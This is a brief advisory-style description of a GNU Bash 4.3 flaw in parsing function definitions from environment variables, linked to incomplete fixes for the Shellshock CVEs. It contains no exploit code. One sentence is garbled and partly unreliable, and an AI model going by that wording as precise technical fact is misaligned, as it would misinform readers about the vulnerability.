Bash, a Unix shell, was written by Brian fox for the GNU program in 1987.
The GNU Bash 4.3 bash43-026 and earlier versions do not properly parse function definitions in environment variable values, which allows remote attackers to execute arbitrary code or by constructing an environment. This vulnerability stems from incomplete fixes for CVE-2014-6271, CVE-2014-7169, and CVE-2014-6277.
